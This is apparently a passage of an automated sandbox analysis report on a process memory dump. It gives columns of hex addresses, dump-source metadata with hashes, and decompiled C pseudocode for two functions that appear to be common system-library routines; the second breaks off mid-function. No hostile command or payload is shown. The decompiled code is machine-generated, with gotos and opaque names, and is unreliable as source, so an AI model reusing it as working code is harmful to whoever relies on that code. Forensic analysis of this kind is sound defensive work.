                                                                                                                                                    0x030ddb69
                                                                                                                                                    0x030ddb6c
                                                                                                                                                    0x030ddb6f
                                                                                                                                                    0x030ddb74
                                                                                                                                                    0x0312b557
                                                                                                                                                    0x0312b557
                                                                                                                                                    0x0312b55e
                                                                                                                                                    0x030ddb7a
                                                                                                                                                    0x030ddb7c
                                                                                                                                                    0x030ddb7f
                                                                                                                                                    0x030ddb82
                                                                                                                                                    0x030ddb85
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddb8b
                                                                                                                                                    0x030ddb8b
                                                                                                                                                    0x030ddb8d
                                                                                                                                                    0x030ddb9b
                                                                                                                                                    0x030ddb9b
                                                                                                                                                    0x030ddb9d
                                                                                                                                                    0x030ddba0
                                                                                                                                                    0x030ddba2
                                                                                                                                                    0x030ddba4
                                                                                                                                                    0x030ddba7
                                                                                                                                                    0x030ddba9
                                                                                                                                                    0x030ddbae
                                                                                                                                                    0x030ddbae
                                                                                                                                                    0x030ddbb1
                                                                                                                                                    0x030ddbb4
                                                                                                                                                    0x030ddbb4
                                                                                                                                                    0x030ddbb7
                                                                                                                                                    0x030ddbba
                                                                                                                                                    0x030ddcd2
                                                                                                                                                    0x030ddcd4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddbc0
                                                                                                                                                    0x030ddbc0
                                                                                                                                                    0x030ddbd2
                                                                                                                                                    0x030ddbd7
                                                                                                                                                    0x030ddbda
                                                                                                                                                    0x030ddbdd
                                                                                                                                                    0x030ddbdf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddbe5
                                                                                                                                                    0x030ddbe5
                                                                                                                                                    0x030ddbee
                                                                                                                                                    0x030ddbf1
                                                                                                                                                    0x0312b541
                                                                                                                                                    0x0312b544
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312b546
                                                                                                                                                    0x0312b546
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312b546
                                                                                                                                                    0x030ddbf7
                                                                                                                                                    0x030ddbf7
                                                                                                                                                    0x030ddbfd
                                                                                                                                                    0x030ddbfd
                                                                                                                                                    0x030ddbff
                                                                                                                                                    0x030ddc0b
                                                                                                                                                    0x030ddc15
                                                                                                                                                    0x030ddc1b
                                                                                                                                                    0x030ddc1d
                                                                                                                                                    0x030ddc21
                                                                                                                                                    0x030ddc21
                                                                                                                                                    0x030ddc23
                                                                                                                                                    0x030ddc23
                                                                                                                                                    0x030ddc26
                                                                                                                                                    0x030ddc29
                                                                                                                                                    0x030ddc2b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc31
                                                                                                                                                    0x030ddc34
                                                                                                                                                    0x030ddc36
                                                                                                                                                    0x030ddcbf
                                                                                                                                                    0x030ddcbf
                                                                                                                                                    0x030ddcc2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc3c
                                                                                                                                                    0x030ddc41
                                                                                                                                                    0x030ddc43
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc45
                                                                                                                                                    0x030ddc45
                                                                                                                                                    0x030ddc47
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc4d
                                                                                                                                                    0x030ddc4d
                                                                                                                                                    0x030ddc50
                                                                                                                                                    0x030ddc52
                                                                                                                                                    0x030ddc55
                                                                                                                                                    0x030ddcfa
                                                                                                                                                    0x030ddcfe
                                                                                                                                                    0x030ddd08
                                                                                                                                                    0x030ddd0a
                                                                                                                                                    0x030ddd0c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddd12
                                                                                                                                                    0x030ddd15
                                                                                                                                                    0x030ddd2d
                                                                                                                                                    0x030ddd2f
                                                                                                                                                    0x030ddd32
                                                                                                                                                    0x030ddd35
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddd35
                                                                                                                                                    0x030ddc5b
                                                                                                                                                    0x030ddc5b
                                                                                                                                                    0x030ddc5e
                                                                                                                                                    0x030ddc61
                                                                                                                                                    0x030ddc64
                                                                                                                                                    0x030ddc67
                                                                                                                                                    0x030ddc67
                                                                                                                                                    0x030ddc6a
                                                                                                                                                    0x030ddc6c
                                                                                                                                                    0x030ddc8e
                                                                                                                                                    0x030ddc8e
                                                                                                                                                    0x030ddc91
                                                                                                                                                    0x030ddc93
                                                                                                                                                    0x030ddcce
                                                                                                                                                    0x030ddcce
                                                                                                                                                    0x030ddc95
                                                                                                                                                    0x030ddc9c
                                                                                                                                                    0x030ddc6e
                                                                                                                                                    0x030ddc72
                                                                                                                                                    0x030ddc75
                                                                                                                                                    0x030ddc77
                                                                                                                                                    0x030ddc79
                                                                                                                                                    0x0312b551
                                                                                                                                                    0x0312b551
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc7f
                                                                                                                                                    0x030ddc7f
                                                                                                                                                    0x030ddc81
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc83
                                                                                                                                                    0x030ddc86
                                                                                                                                                    0x030ddc88
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc88
                                                                                                                                                    0x030ddc81
                                                                                                                                                    0x030ddc79
                                                                                                                                                    0x030ddc6c
                                                                                                                                                    0x030ddc55
                                                                                                                                                    0x030ddc47
                                                                                                                                                    0x030ddc43
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddc36
                                                                                                                                                    0x030ddc23
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddbff
                                                                                                                                                    0x030ddbf1
                                                                                                                                                    0x030ddbdf
                                                                                                                                                    0x030ddb8f
                                                                                                                                                    0x030ddb92
                                                                                                                                                    0x030ddb95
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ddb95
                                                                                                                                                    0x030ddb8d
                                                                                                                                                    0x030ddb85
                                                                                                                                                    0x030ddb74
                                                                                                                                                    0x030ddc9f
                                                                                                                                                    0x030ddca2
                                                                                                                                                    0x030ddcb0
                                                                                                                                                    0x030ddcb0
                                                                                                                                                    0x030ddad1
                                                                                                                                                    0x0312b4e5
                                                                                                                                                    0x0312b4c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030dd831
                                                                                                                                                    0x030dd80d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030dd800
                                                                                                                                                    0x0312b47f
                                                                                                                                                    0x0312b485
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312b485
                                                                                                                                                    0x030dd665
                                                                                                                                                    0x030dd652
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 10658c7965dab6854c6ec74b267b270806f43bd0deeefdddf8f413f813d1b827
                                                                                                                                                    • Instruction ID: fa119a22f2585100d9171914f34824fd9232cace568786a5d178a41c3b671d7f
                                                                                                                                                    • Opcode Fuzzy Hash: 10658c7965dab6854c6ec74b267b270806f43bd0deeefdddf8f413f813d1b827
                                                                                                                                                    • Instruction Fuzzy Hash: BBE1C434A06359CFDB24DF18C980BAEB7F6BF89304F0841D9D9499B290E774A981CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D849B, Relevance: .3, Instructions: 290COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E030D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x319f9c0);
				E0311D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x31b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E030DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E030E2280( *[fs:0x30], 0x31b8550);
						_t139 =  *0x31b7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E030FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E030DFFB0(_t193, _t235, 0x31b8550);
								L5:
								return E0311D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E030C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x31b7b9c; // 0x0
							_t235 = L030E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x31b7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E030FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E030DFFB0(_t193, _t235, 0x31b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L030E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L030E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x31b7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x31b7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E031037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x31b7b9c; // 0x0
									_t214 = L030E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E031037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x31b7b10 =  *0x31b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x31b7b04 =  *0x31b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L030E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L030E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x31b7b08 =  *0x31b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E031057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0310F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L030E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E030FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L030E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E031096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                                                                    0x030d849b
                                                                                                                                                    0x030d849b
                                                                                                                                                    0x030d849b
                                                                                                                                                    0x030d849b
                                                                                                                                                    0x030d849d
                                                                                                                                                    0x030d84a2
                                                                                                                                                    0x030d84a7
                                                                                                                                                    0x030d84b1
                                                                                                                                                    0x030d84d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d84b3
                                                                                                                                                    0x030d84c4
                                                                                                                                                    0x030d84c9
                                                                                                                                                    0x030d84cd
                                                                                                                                                    0x030d84cf
                                                                                                                                                    0x030d84cf
                                                                                                                                                    0x030d84d6
                                                                                                                                                    0x030d84e6
                                                                                                                                                    0x030d84e9
                                                                                                                                                    0x030d84ec
                                                                                                                                                    0x030d84ef
                                                                                                                                                    0x030d84f2
                                                                                                                                                    0x030d84f4
                                                                                                                                                    0x030d84fc
                                                                                                                                                    0x030d8501
                                                                                                                                                    0x030d8506
                                                                                                                                                    0x030d8509
                                                                                                                                                    0x030d86e0
                                                                                                                                                    0x030d86e5
                                                                                                                                                    0x030d86e8
                                                                                                                                                    0x030d86ed
                                                                                                                                                    0x030d86f0
                                                                                                                                                    0x030d86f2
                                                                                                                                                    0x03129afd
                                                                                                                                                    0x03129b02
                                                                                                                                                    0x030d84da
                                                                                                                                                    0x030d84df
                                                                                                                                                    0x030d84df
                                                                                                                                                    0x030d86fa
                                                                                                                                                    0x030d86fd
                                                                                                                                                    0x030d86fe
                                                                                                                                                    0x030d8701
                                                                                                                                                    0x030d8706
                                                                                                                                                    0x030d8709
                                                                                                                                                    0x030d870b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8711
                                                                                                                                                    0x030d8725
                                                                                                                                                    0x030d8727
                                                                                                                                                    0x030d872a
                                                                                                                                                    0x030d872c
                                                                                                                                                    0x03129af0
                                                                                                                                                    0x03129af5
                                                                                                                                                    0x030d8732
                                                                                                                                                    0x030d8732
                                                                                                                                                    0x030d8732
                                                                                                                                                    0x030d8735
                                                                                                                                                    0x030d8737
                                                                                                                                                    0x030d8515
                                                                                                                                                    0x030d8515
                                                                                                                                                    0x030d8518
                                                                                                                                                    0x030d851d
                                                                                                                                                    0x030d8523
                                                                                                                                                    0x030d8527
                                                                                                                                                    0x030d852b
                                                                                                                                                    0x030d8537
                                                                                                                                                    0x030d8539
                                                                                                                                                    0x030d853c
                                                                                                                                                    0x030d853e
                                                                                                                                                    0x030d868c
                                                                                                                                                    0x030d8691
                                                                                                                                                    0x030d8699
                                                                                                                                                    0x030d869b
                                                                                                                                                    0x030d8744
                                                                                                                                                    0x030d8748
                                                                                                                                                    0x030d86a1
                                                                                                                                                    0x030d86a1
                                                                                                                                                    0x030d86a1
                                                                                                                                                    0x030d86a4
                                                                                                                                                    0x030d86a8
                                                                                                                                                    0x03129bdf
                                                                                                                                                    0x03129bdf
                                                                                                                                                    0x030d86ae
                                                                                                                                                    0x030d86b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d86b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129be9
                                                                                                                                                    0x030d86b0
                                                                                                                                                    0x030d8544
                                                                                                                                                    0x030d854a
                                                                                                                                                    0x030d854d
                                                                                                                                                    0x030d8551
                                                                                                                                                    0x030d876e
                                                                                                                                                    0x030d8778
                                                                                                                                                    0x030d877b
                                                                                                                                                    0x030d8780
                                                                                                                                                    0x030d8557
                                                                                                                                                    0x030d8557
                                                                                                                                                    0x030d855d
                                                                                                                                                    0x030d855d
                                                                                                                                                    0x030d856b
                                                                                                                                                    0x030d856e
                                                                                                                                                    0x030d8570
                                                                                                                                                    0x030d8573
                                                                                                                                                    0x030d8576
                                                                                                                                                    0x030d8576
                                                                                                                                                    0x030d8579
                                                                                                                                                    0x030d857b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8581
                                                                                                                                                    0x030d85a0
                                                                                                                                                    0x030d85a2
                                                                                                                                                    0x030d85a5
                                                                                                                                                    0x030d85a7
                                                                                                                                                    0x03129b1b
                                                                                                                                                    0x03129b1b
                                                                                                                                                    0x030d862e
                                                                                                                                                    0x030d862e
                                                                                                                                                    0x030d8631
                                                                                                                                                    0x030d8631
                                                                                                                                                    0x030d8634
                                                                                                                                                    0x030d8636
                                                                                                                                                    0x030d8669
                                                                                                                                                    0x030d8669
                                                                                                                                                    0x030d866b
                                                                                                                                                    0x03129bbf
                                                                                                                                                    0x03129bc4
                                                                                                                                                    0x03129bc8
                                                                                                                                                    0x03129bce
                                                                                                                                                    0x03129bce
                                                                                                                                                    0x030d8671
                                                                                                                                                    0x030d8671
                                                                                                                                                    0x030d8674
                                                                                                                                                    0x030d8676
                                                                                                                                                    0x03129bae
                                                                                                                                                    0x03129bae
                                                                                                                                                    0x030d8676
                                                                                                                                                    0x030d867c
                                                                                                                                                    0x030d867e
                                                                                                                                                    0x030d8688
                                                                                                                                                    0x030d8688
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d867e
                                                                                                                                                    0x030d8638
                                                                                                                                                    0x030d8638
                                                                                                                                                    0x030d863b
                                                                                                                                                    0x030d863e
                                                                                                                                                    0x030d863f
                                                                                                                                                    0x030d8642
                                                                                                                                                    0x030d8645
                                                                                                                                                    0x030d8648
                                                                                                                                                    0x030d864d
                                                                                                                                                    0x03129b69
                                                                                                                                                    0x03129b6e
                                                                                                                                                    0x03129b7b
                                                                                                                                                    0x03129b81
                                                                                                                                                    0x03129b85
                                                                                                                                                    0x03129b89
                                                                                                                                                    0x03129ba7
                                                                                                                                                    0x03129b8b
                                                                                                                                                    0x03129b91
                                                                                                                                                    0x03129b9a
                                                                                                                                                    0x03129b9f
                                                                                                                                                    0x03129b9f
                                                                                                                                                    0x030d8788
                                                                                                                                                    0x030d878d
                                                                                                                                                    0x030d8763
                                                                                                                                                    0x030d8763
                                                                                                                                                    0x030d8766
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8766
                                                                                                                                                    0x03129b70
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129b70
                                                                                                                                                    0x030d8656
                                                                                                                                                    0x030d865a
                                                                                                                                                    0x030d865c
                                                                                                                                                    0x030d8752
                                                                                                                                                    0x030d8756
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d875e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d875e
                                                                                                                                                    0x030d8662
                                                                                                                                                    0x030d8662
                                                                                                                                                    0x030d8662
                                                                                                                                                    0x030d8666
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8666
                                                                                                                                                    0x030d85b7
                                                                                                                                                    0x030d85b9
                                                                                                                                                    0x030d85bc
                                                                                                                                                    0x030d85bf
                                                                                                                                                    0x030d85cc
                                                                                                                                                    0x030d85d1
                                                                                                                                                    0x030d85d4
                                                                                                                                                    0x030d85db
                                                                                                                                                    0x030d85de
                                                                                                                                                    0x030d85e0
                                                                                                                                                    0x03129b5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129b5f
                                                                                                                                                    0x030d85e6
                                                                                                                                                    0x030d85ea
                                                                                                                                                    0x030d86c3
                                                                                                                                                    0x030d86c5
                                                                                                                                                    0x030d86c8
                                                                                                                                                    0x030d86ca
                                                                                                                                                    0x03129b16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03129b16
                                                                                                                                                    0x030d86d6
                                                                                                                                                    0x030d85f6
                                                                                                                                                    0x030d85f6
                                                                                                                                                    0x030d85f9
                                                                                                                                                    0x030d8602
                                                                                                                                                    0x030d8606
                                                                                                                                                    0x030d860a
                                                                                                                                                    0x030d860b
                                                                                                                                                    0x030d860e
                                                                                                                                                    0x030d8611
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8611
                                                                                                                                                    0x030d85f3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d85f3
                                                                                                                                                    0x030d8619
                                                                                                                                                    0x030d861e
                                                                                                                                                    0x030d861e
                                                                                                                                                    0x030d8621
                                                                                                                                                    0x030d8622
                                                                                                                                                    0x030d8623
                                                                                                                                                    0x030d8625
                                                                                                                                                    0x030d862c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d873d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d873d
                                                                                                                                                    0x030d8737
                                                                                                                                                    0x030d850f
                                                                                                                                                    0x030d8512
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d8512
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d84d6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 43bba2c45d284c232a8963f86737052870e8f1e4825b9bfd45560732a156f8d4
                                                                                                                                                    • Instruction ID: cc05fd753507aab196366ffebf3a99a364b0535e301fa01e042d006186edf0ad
                                                                                                                                                    • Opcode Fuzzy Hash: 43bba2c45d284c232a8963f86737052870e8f1e4825b9bfd45560732a156f8d4
                                                                                                                                                    • Instruction Fuzzy Hash: 52B15B74E01319DFCB18DFA9C984AEEBBF9BF88304F148529E405AB685E770A951CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F513A, Relevance: .3, Instructions: 258COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 67%
                                                                                                                                                    			E030F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x31bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
